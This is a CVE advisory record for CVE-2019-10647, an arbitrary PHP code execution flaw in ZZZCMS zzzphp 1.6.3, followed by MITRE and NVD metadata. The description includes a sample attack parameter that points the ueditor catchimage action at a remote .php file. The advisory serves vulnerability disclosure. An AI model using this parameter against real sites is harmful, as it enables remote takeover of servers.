ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).
Metrics
Affected Vendors & Products
References
History
No history.
MITRE
Status: PUBLISHED
Assigner: mitre
Published: 2019-03-30T12:30:59
Updated: 2024-08-04T22:32:00.646Z
Reserved: 2019-03-30T00:00:00
Link: CVE-2019-10647
Vulnrichment
No data.
NVD
Status : Analyzed
Published: 2019-03-30T13:29:00.467
Modified: 2019-04-01T15:01:03.527
Link: CVE-2019-10647
Redhat
No data.